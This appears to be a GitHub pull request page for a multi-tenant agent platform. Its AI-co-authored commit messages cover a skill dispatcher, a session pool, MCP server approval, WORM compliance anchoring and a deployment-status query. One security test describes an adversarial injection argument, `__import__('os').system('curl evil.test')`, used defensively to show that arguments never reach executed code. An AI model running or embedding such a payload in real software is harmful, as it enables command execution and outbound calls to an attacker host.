feat: add deployment status to Settings page #7
Merged
Surface deployment infrastructure info (stage, region, services, resources, URLs) on the admin Settings page via a new deploymentStatus GraphQL query that reads Lambda environment variables. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
ericodom added a commit that referenced this pull request on Apr 24, 2026
…SI-2/3/6) (#510)

Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today: the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer.

## What lands

### `container-sources/skill_session_pool.py`

Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API:

- `acquire(key) -> SessionHandle` (warm reuse or fresh start)
- `handle.release()`
- `flush_for_tenant(tenant_id)`: U12 kill-switch path
- `flush_all()`: ops escape hatch
- `prune_idle()`: caller decides cadence; exposed so tests advance time

### `container-sources/skill_dispatcher.py`

`dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced:

- **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source.
- **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session.
- Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded).
- Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream.

SI-3 (user-scoped pool key) is enforced structurally in the pool itself.

### `test_skill_session_pool.py` (9 cases)

Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all.
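The pool behaviour described above (user-scoped key, per-key lock, warm reuse, idle pruning, tenant flush) can be sketched roughly as follows. This is an illustrative sketch, not the code in `skill_session_pool.py`: the class name `SessionPool`, the `start_session` callable, the injected `clock`, and `pool.release(handle)` (the commit exposes `handle.release()`) are all assumptions, and the LRU cap of 8 is omitted for brevity.

```python
import asyncio
import time
from dataclasses import dataclass
from typing import Awaitable, Callable, Dict, List, Tuple

PoolKey = Tuple[str, str, str]  # (tenant_id, user_id, environment)


@dataclass
class SessionHandle:
    key: PoolKey
    session_id: str
    last_used: float
    in_use: bool = True


class SessionPool:
    """Hypothetical pool; the LRU cap from the commit message is not modelled."""

    def __init__(
        self,
        start_session: Callable[[PoolKey], Awaitable[str]],
        idle_timeout_s: float = 30 * 60,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._start = start_session
        self._idle_timeout_s = idle_timeout_s
        self._clock = clock  # injectable so tests can freeze time
        self._slots: Dict[PoolKey, List[SessionHandle]] = {}
        self._locks: Dict[PoolKey, asyncio.Lock] = {}

    async def acquire(self, key: PoolKey) -> SessionHandle:
        lock = self._locks.setdefault(key, asyncio.Lock())
        async with lock:  # serialize acquires on the same key
            for handle in self._slots.setdefault(key, []):
                if not handle.in_use:  # warm reuse
                    handle.in_use = True
                    handle.last_used = self._clock()
                    return handle
            session_id = await self._start(key)  # fresh start
            handle = SessionHandle(key, session_id, self._clock())
            self._slots[key].append(handle)
            return handle

    def release(self, handle: SessionHandle) -> None:
        handle.in_use = False
        handle.last_used = self._clock()

    def prune_idle(self) -> int:
        """Drop released sessions idle for at least the timeout; return the count."""
        now = self._clock()
        removed = 0
        for key, slots in self._slots.items():
            keep = [h for h in slots
                    if h.in_use or now - h.last_used < self._idle_timeout_s]
            removed += len(slots) - len(keep)
            self._slots[key] = keep
        return removed

    def flush_for_tenant(self, tenant_id: str) -> int:
        """Drop every session whose key belongs to the tenant."""
        doomed = [k for k in self._slots if k[0] == tenant_id]
        return sum(len(self._slots.pop(k)) for k in doomed)


async def demo() -> dict:
    starts = 0

    async def start_session(key: PoolKey) -> str:
        nonlocal starts
        starts += 1
        return f"session-{starts}"

    now = [0.0]
    pool = SessionPool(start_session, idle_timeout_s=1800, clock=lambda: now[0])
    alice, bob = ("t1", "alice", "dev"), ("t1", "bob", "dev")
    first = await pool.acquire(alice)
    pool.release(first)
    second = await pool.acquire(alice)  # same key: warm reuse
    other = await pool.acquire(bob)     # same tenant, different user
    pool.release(second)
    pool.release(other)
    now[0] = 1801.0                     # advance the frozen clock
    return {
        "reused": first is second,
        "distinct_users": other.session_id != first.session_id,
        "starts": starts,
        "pruned": pool.prune_idle(),
    }
```

Because `user_id` is part of the key, two users on one tenant can never be handed the same session, which is the structural form of SI-3 the commit message refers to.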
### `test_skill_dispatcher.py` (9 cases)

Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure.

### `test_skill_dispatcher_security.py` (6 cases)

Each named with its SI number so grep surfaces coverage at review time:

- SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string.
- SI-2: exec template byte-identical across two invocations with different args; a structural assertion that fails if anyone ever reintroduces interpolation.
- SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates.
- SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug.

### Wiring

- `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed.
- `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers.

## What this does NOT do

- Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool).
- Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires, since extracting now would add a seam with no caller yet.
- Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness.

## Test plan

- [x] `uv run ... pytest` on the three new files: 24 tests green
- [x] Full `pytest packages/agentcore-strands/agent-container/`: 211 green (24 new + 187 existing)
- [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests)
- [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts`: 9 tests green
- [x] ruff import-sort clean on every new file
- [x] prettier clean on every touched TS file

Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4).

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
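The SI-2 and SI-6 invariants above can be illustrated with a small sketch. It is not the dispatcher's real template: the helper name `build_invocation`, the `scripts.<slug>.entry` module path, and the slug pattern are assumptions made for illustration. The point it shows is that model-controlled args only ever reach the sandbox as a JSON file, so the code string stays byte-identical across calls for a given slug.

```python
import json
import re
from typing import Any, Dict, Tuple

# Hypothetical slug rule; the real catalog validation may differ.
_SLUG_RE = re.compile(r"[a-z0-9][a-z0-9_-]*")

# Fixed template: only the catalog-validated slug is substituted, never args.
_TEMPLATE = '''\
import importlib, json, sys
for name in [m for m in sys.modules
             if m == "scripts.{slug}" or m.startswith("scripts.{slug}.")]:
    del sys.modules[name]  # SI-6: drop modules cached by a previous call
importlib.invalidate_caches()
entry = importlib.import_module("scripts.{slug}.entry")  # assumed layout
with open("_args.json") as fh:
    args = json.load(fh)  # SI-2: args arrive as data, not as source text
print(json.dumps(entry.run(**args)))
'''


def build_invocation(slug: str, args: Dict[str, Any]) -> Tuple[Dict[str, str], str]:
    """Return (files_to_write, code_to_execute) for one skill call."""
    if not _SLUG_RE.fullmatch(slug):
        raise ValueError(f"invalid skill slug: {slug!r}")
    files = {"_args.json": json.dumps(args)}
    code = _TEMPLATE.format(slug=slug)
    return files, code
```

A structural test in the spirit of the security suite would call `build_invocation` twice with different args and assert the two code strings are equal, which fails as soon as someone interpolates an argument into the template.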
ericodom added a commit that referenced this pull request on Apr 24, 2026
…s inert) (#511)

The single `Skill(name, args)` meta-tool that U6 flips to be the sole invocation path once U7's shadow harness validates equivalence. Today it ships as inert code: the Dockerfile wildcard COPY picks it up (via U2a) and _boot_assert registers it, but server.py's live Agent(tools=...) path still routes through the existing run_skill_dispatch / composition_runner code.

## Why ship inert

The plan (#7 §U4/U5/U6/U7) explicitly gates U6's cutover on U7 PASS. U7 is the shadow harness that dual-dispatches both the old and new paths on real invocations and measures divergence. Wiring U5 into the live Agent(tools=...) before U7 exists would swap the invocation path without the safety net the plan itself calls for. This PR therefore ships the module + tests and defers server.py wiring to U7.

## What lands

### `container-sources/skill_meta_tool.py`

- `SessionAllowlist`: intersection of `tenant_skills ∩ template_skills ∩ ¬template_blocks ∩ ¬tenant_kill_switches` pre-computed once at Agent(tools=...). Narrow-only: a template cannot widen past what the tenant enabled (plan R6/R7).
- `invoke_skill(name, args, *, ctx)`: pure entry point the Strands @tool wrapper calls. Routes script-bundle skills to U4's `dispatch_skill_script`; pure-SKILL.md skills return their body for in-prompt consumption (no sandbox roundtrip).
- `build_skill_meta_tool(ctx)`: factory returning the coroutine the `@strands.tool` decorator wraps. Decoupled from the SDK so unit tests exercise the full decision tree without importing strands.
- `intersect_allowed_tools(declared, session_tools)`: narrow-only intersection of a skill's declared `allowed-tools` frontmatter against the session's effective tool set. Warns on declared-but-missing so operators can spot disabled dependencies.
- `SkillUnauthorized`: distinct error from `SkillNotFound` so the model cannot enumerate tenant-scoped catalog membership by probing slugs. Both raise; the audit log gets full context.
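The `SessionAllowlist` set algebra and the two distinct errors can be sketched as below. The class shape, the `build` constructor, and the `check_access` helper are illustrative assumptions; only the intersection formula and the error names come from the commit message.

```python
from dataclasses import dataclass
from typing import AbstractSet, FrozenSet, Iterable


class SkillNotFound(Exception):
    """Slug is not in the catalog at all."""


class SkillUnauthorized(Exception):
    """Slug exists in the catalog but is not allowed in this session."""


@dataclass(frozen=True)
class SessionAllowlist:
    allowed: FrozenSet[str]

    @classmethod
    def build(
        cls,
        tenant_skills: Iterable[str],
        template_skills: Iterable[str],
        template_blocks: Iterable[str] = (),
        tenant_kill_switches: Iterable[str] = (),
    ) -> "SessionAllowlist":
        # tenant ∩ template, minus template blocks, minus tenant kill switches.
        allowed = set(tenant_skills) & set(template_skills)
        allowed -= set(template_blocks)
        allowed -= set(tenant_kill_switches)
        return cls(frozenset(allowed))

    def permits(self, slug: str) -> bool:
        return slug in self.allowed


def check_access(slug: str, catalog: AbstractSet[str],
                 allowlist: SessionAllowlist) -> None:
    """Raise the appropriate error, or return None when the call may proceed."""
    if slug not in catalog:
        raise SkillNotFound(slug)
    if not allowlist.permits(slug):
        raise SkillUnauthorized(slug)
```

Since every term after the first only removes members, a skill the tenant never enabled cannot appear in the result no matter what the template lists, which is the narrow-only property (R6/R7) described above.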
### `test_skill_meta_tool.py` (12 cases)

Covers plan AE4 + every listed test scenario:

- happy path: Skill("sales-prep") routes to dispatcher with correct args
- nested Skill() threads the same TurnCounters through
- pure-SKILL.md slug returns body, no sandbox
- unknown slug → SkillNotFound
- in catalog but not in session → SkillUnauthorized
- SessionAllowlist triple-constraint intersection correctness
- tenant kill-switch trumps template enablement (R7 precedence)
- allowed-tools frontmatter narrows (never widens) past session tools
- build_skill_meta_tool closure captures ctx correctly

### `_boot_assert.EXPECTED_CONTAINER_SOURCES`

Adds skill_meta_tool so the Dockerfile RUN asserts it landed.

## What this PR does NOT do

- Does NOT wire `Skill` into server.py's Agent(tools=...). Deferred to U7 (shadow wiring) then U6 (canonical cutover).
- Does NOT drop the AGENTS.md-conditional around AgentSkills. Plan calls for this at U5 but it's entangled with the live-path swap, so it lands alongside the cutover.
- Does NOT suppress AgentSkills' built-in `skills` tool. Same reason: suppression only makes sense once `Skill` is the canonical path.

## Test counts

- `test_skill_meta_tool.py`: 12 cases
- Full agent-container suite: 223 green (12 new + 211 existing)
- ruff import-sort clean on new files

Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U5).

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
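The "narrows, never widens" behaviour of `intersect_allowed_tools` might look something like the following. The function name and parameters match the commit message; the list return type, the order-preserving behaviour, and the logger name are assumptions.

```python
import logging
from typing import Iterable, List

logger = logging.getLogger("skill_meta_tool_sketch")  # hypothetical logger name


def intersect_allowed_tools(declared: Iterable[str],
                            session_tools: Iterable[str]) -> List[str]:
    """Keep only declared tools that the session actually has, in declared order."""
    declared_list = list(declared)
    session = set(session_tools)
    missing = [tool for tool in declared_list if tool not in session]
    if missing:
        # Surface declared-but-missing tools so operators can spot disabled dependencies.
        logger.warning("declared allowed-tools not in session: %s", ", ".join(missing))
    return [tool for tool in declared_list if tool in session]
```

Tools present in the session but not declared by the skill are dropped as well, so the result is never larger than either input.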
ericodom added a commit that referenced this pull request on Apr 24, 2026
…520)

Wires the admin decision surface for plugin-uploaded MCP servers. Plan §U11 lands:

- `POST /api/tenants/:tenantId/mcp-servers/:serverId/approve` computes `url_hash = sha256(canonical(url, auth_config))`, sets `status='approved'` + `approved_by` + `approved_at`.
- `POST /api/tenants/:tenantId/mcp-servers/:serverId/reject` clears approval metadata; reason captured in CloudWatch audit log.
- `buildMcpConfigs` SQL gate narrows to `status='approved' AND enabled=true`, with an in-code defensive hash-match check for drift (grandfathered `url_hash IS NULL` rows pass through).
- `applyMcpServerFieldUpdate` reverts approved rows back to `pending` on any url/auth_config mutation (SI-5). mcpUpdateServer + mcpRegisterServer upsert + DCR cache route through it; DCR stays approved by recomputing url_hash (system-internal discovery, not admin intent).
- Daily EventBridge sweeper auto-rejects pending rows older than 30 days.
- Admin SPA renders the approval badge and surfaces Approve / Reject buttons for pending rows; Reject accepts an optional reason.
- Cognito-only client (`cognitoFetch`) for the approval routes; mirrors plugin-upload.ts's REST analogue of requireTenantAdmin.
- 40 new unit tests: hash canonicalization, approve/reject handler (authz + tenant isolation), SI-5 url-swap protection, TTL sweeper, and buildMcpConfigs approved-filter behavior.

Terraform wires two new handlers (`mcp-approval`, `mcp-approval-sweeper`), four new API Gateway routes, and a daily cron. No schema migration required: `status`, `url_hash`, `approved_by`, `approved_at` all landed with U3 migration 0025.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
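The approval hash and the defensive drift check can be sketched as follows. The handlers in this commit are TypeScript; this Python version only illustrates the idea, and the canonical form (sorted-key compact JSON), the row field layout, and the helper names `compute_url_hash` and `is_servable` are assumptions rather than the project's actual code.

```python
import hashlib
import json
from typing import Any, Mapping, Optional


def canonical(url: str, auth_config: Mapping[str, Any]) -> bytes:
    """Assumed canonical form: compact JSON with sorted keys."""
    payload = {"url": url, "auth_config": auth_config}
    return json.dumps(payload, sort_keys=True, separators=(",", ":")).encode("utf-8")


def compute_url_hash(url: str, auth_config: Mapping[str, Any]) -> str:
    return hashlib.sha256(canonical(url, auth_config)).hexdigest()


def is_servable(row: Mapping[str, Any]) -> bool:
    """Mirror of the gate: approved + enabled, then hash match unless grandfathered."""
    if row.get("status") != "approved" or not row.get("enabled"):
        return False
    stored: Optional[str] = row.get("url_hash")
    if stored is None:  # grandfathered rows pass through
        return True
    return stored == compute_url_hash(row["url"], row.get("auth_config") or {})
```

With this shape, changing `url` or `auth_config` after approval without re-approving makes the stored hash stale, so the row drops out of the served set even if its `status` column was never reset.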
8 tasks
ericodom added a commit that referenced this pull request on May 5, 2026
feat: add deployment status to Settings page
This was referenced May 7, 2026
ericodom added a commit that referenced this pull request on May 7, 2026
…k retention)
Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the
actual S3 PutObject of per-tenant proof slices and the global anchor
JSON to the WORM-locked compliance bucket. The anchor object carries an
explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object
override (mirroring the bucket-default), so the retention contract is
portable across buckets and visible at the call site. Slices write
under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object
lock; bucket default applies); anchor writes last so a partial failure
never publishes a verifier-discoverable commit point.
Five guards land alongside the body swap:
* **Deterministic cadence_id** — sha256 of canonical chain-head
fingerprint, reshaped to UUIDv7 form. Same heads produce the same
cadence_id, so a retry after a partial failure overwrites its own
slice keys instead of orphaning slices for the full 365-day
retention window.
* **Merkle self-check** — `_anchor_fn_live` recomputes the root from
the received leaves and asserts equality before any PutObject. Cheap
insurance against latent runAnchorPass arithmetic bugs becoming
WORM-locked poisoned evidence.
* **Layer 2 body-swap test** — `compliance-anchor-s3-spy.test.ts`
mocks S3Client.send and asserts the live function actually issues
PutObjectCommand for both slices and anchor (with SHA256 checksum,
SSE-KMS, and ObjectLock retention on the anchor key only). Pairs
with the Layer 1 identity assertion (`getWiredAnchorFn() ===
_anchor_fn_live`) in the integration test.
* **Sibling watchdog IAM role** — watchdog moves OFF the shared
lambda role onto a dedicated role with `kms:DescribeKey` only on
the bucket CMK (NOT `kms:Decrypt` — the watchdog never reads
object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`,
and an explicit Deny on every Delete + Bypass + Lock-mutation
action so future role broadening cannot turn the watchdog into a
deletion vector.
* **Dev-COMPLIANCE precondition** — `var.allow_compliance_in_non_prod`
(default false) blocks accidentally locking a dev bucket into
irreversible COMPLIANCE bytes via a stage typo.
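
Two of the guards above, the deterministic cadence_id and the Merkle self-check, can be sketched in a few lines. The real code is TypeScript (`compliance-anchor.ts`); this Python sketch is illustrative only. The fingerprint encoding, the choice of the first 16 digest bytes, and the Merkle construction (SHA-256 over concatenated children, last node duplicated on odd levels) are all assumptions, not the project's actual scheme.

```python
import hashlib
import json
import uuid
from typing import List, Mapping, Sequence


def cadence_id(chain_heads: Mapping[str, str]) -> str:
    """Derive a stable UUIDv7-shaped id from the chain heads (tenant -> head hash)."""
    # Sort so that dict ordering cannot change the fingerprint.
    fingerprint = json.dumps(sorted(chain_heads.items()),
                             separators=(",", ":")).encode("utf-8")
    raw = bytearray(hashlib.sha256(fingerprint).digest()[:16])
    raw[6] = (raw[6] & 0x0F) | 0x70  # version nibble = 7
    raw[8] = (raw[8] & 0x3F) | 0x80  # RFC 4122/9562 variant bits
    return str(uuid.UUID(bytes=bytes(raw)))


def merkle_root(leaves: Sequence[bytes]) -> bytes:
    """Assumed construction: sha256 leaves, pairwise sha256, duplicate odd tail."""
    if not leaves:
        raise ValueError("no leaves")
    level: List[bytes] = [hashlib.sha256(leaf).digest() for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])
        level = [hashlib.sha256(level[i] + level[i + 1]).digest()
                 for i in range(0, len(level), 2)]
    return level[0]


def assert_root_matches(leaves: Sequence[bytes], claimed_root: bytes) -> None:
    """Self-check to run before any write to the locked bucket."""
    if merkle_root(leaves) != claimed_root:
        raise ValueError("Merkle root mismatch; refusing to write anchor")
```

Because the id is a pure function of the heads, a retry after a partial failure regenerates the same slice keys and overwrites them rather than leaving orphans, and the self-check runs before any object is written.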
Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key
truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric
emission (suppressed on greenfield-empty bucket), heartbeat unchanged.
The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching`
(catches both real gaps and a watchdog-down regression); a sibling
heartbeat-missing alarm is born `notBreaching` so deploy-time gaps
don't fire it before the first heartbeat lands (Decision #7).
Operator pre-merge step: `terraform state mv` the watchdog from the
for_each handler set to the new standalone resource address. Without
it, the next `terraform apply` fails with ResourceConflictException on
the function name. Plan documents the exact command.
Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md
Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
ericodom added a commit that referenced this pull request on May 7, 2026
…k retention) (#927)

* feat(compliance): U8b - anchor Lambda live (S3 PutObject + Object Lock retention)

  Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the actual S3 PutObject of per-tenant proof slices and the global anchor JSON to the WORM-locked compliance bucket. The anchor object carries an explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object override (mirroring the bucket-default), so the retention contract is portable across buckets and visible at the call site. Slices write under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object lock; bucket default applies); anchor writes last so a partial failure never publishes a verifier-discoverable commit point.

  Five guards land alongside the body swap:

  * **Deterministic cadence_id**: sha256 of canonical chain-head fingerprint, reshaped to UUIDv7 form. Same heads produce the same cadence_id, so a retry after a partial failure overwrites its own slice keys instead of orphaning slices for the full 365-day retention window.
  * **Merkle self-check**: `_anchor_fn_live` recomputes the root from the received leaves and asserts equality before any PutObject. Cheap insurance against latent runAnchorPass arithmetic bugs becoming WORM-locked poisoned evidence.
  * **Layer 2 body-swap test**: `compliance-anchor-s3-spy.test.ts` mocks S3Client.send and asserts the live function actually issues PutObjectCommand for both slices and anchor (with SHA256 checksum, SSE-KMS, and ObjectLock retention on the anchor key only). Pairs with the Layer 1 identity assertion (`getWiredAnchorFn() === _anchor_fn_live`) in the integration test.
  * **Sibling watchdog IAM role**: watchdog moves OFF the shared lambda role onto a dedicated role with `kms:DescribeKey` only on the bucket CMK (NOT `kms:Decrypt`, since the watchdog never reads object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`, and an explicit Deny on every Delete + Bypass + Lock-mutation action so future role broadening cannot turn the watchdog into a deletion vector.
  * **Dev-COMPLIANCE precondition**: `var.allow_compliance_in_non_prod` (default false) blocks accidentally locking a dev bucket into irreversible COMPLIANCE bytes via a stage typo.

  Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric emission (suppressed on greenfield-empty bucket), heartbeat unchanged. The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching` (catches both real gaps and a watchdog-down regression); a sibling heartbeat-missing alarm is born `notBreaching` so deploy-time gaps don't fire it before the first heartbeat lands (Decision #7).

  Operator pre-merge step: `terraform state mv` the watchdog from the for_each handler set to the new standalone resource address. Without it, the next `terraform apply` fails with ResourceConflictException on the function name. Plan documents the exact command.

  Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md
  Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b)

  Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(review): apply autofix feedback

  Drop unused drizzle-orm imports flagged by ce-code-review:

  - compliance-anchor.ts: `and`, `eq`, `gt`, plus the `auditEvents` schema import (raw SQL via `` sql`...` `` is the actual codepath there)
  - compliance-anchor.integration.test.ts: `and`, `gt`, `auditOutbox`

  Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(compliance): make compliance-anchor.test.ts stub anchorFn async

  `AnchorFn` is now `=> Promise<...>` in U8b. The timestamp-normalization test added in #925 used a sync stub, which fails typecheck against the new contract. Switch the stub to `async () => ({ anchored: false })`. The test still exercises the same path (recorded_at coercion → drainer update) since runAnchorPass awaits the result either way.

  Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
## Summary

- Add `deploymentStatus` GraphQL query + resolver that reads Lambda env vars (no DB, no live AWS calls)
- Add `DeploymentStatus` type to GraphQL schema with stage, region, services, resources, and URLs
- Add new env vars (`ADMIN_URL`, `DOCS_URL`, `APPSYNC_REALTIME_URL`, `ECR_REPOSITORY_URL`, `AWS_ACCOUNT_ID`) to Lambda common_env

## Test plan

- `terraform plan` confirms new env vars are added without drift

🤖 Generated with Claude Code
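
The env-var-only resolver described in the summary can be sketched as below. The PR's resolver is part of the TypeScript API; this Python version only illustrates the approach of building the status purely from environment variables. The function name `deployment_status`, the `STAGE` variable, and the response field names are assumptions. The five env var names come from the summary, and `AWS_REGION` is set by the Lambda runtime.

```python
import os
from typing import Any, Dict, Mapping, Optional


def deployment_status(env: Mapping[str, str] = os.environ) -> Dict[str, Any]:
    """Build a status payload from env vars only: no DB and no live AWS calls."""

    def get(name: str) -> Optional[str]:
        # Treat unset and empty values the same way.
        return env.get(name) or None

    return {
        "stage": get("STAGE"),        # hypothetical variable name
        "region": get("AWS_REGION"),  # provided by the Lambda runtime
        "accountId": get("AWS_ACCOUNT_ID"),
        "urls": {
            "admin": get("ADMIN_URL"),
            "docs": get("DOCS_URL"),
            "appsyncRealtime": get("APPSYNC_REALTIME_URL"),
        },
        "resources": {
            "ecrRepositoryUrl": get("ECR_REPOSITORY_URL"),
        },
    }
```

Passing the environment in as a parameter keeps the function testable without touching the process environment, and missing variables surface as nulls rather than errors.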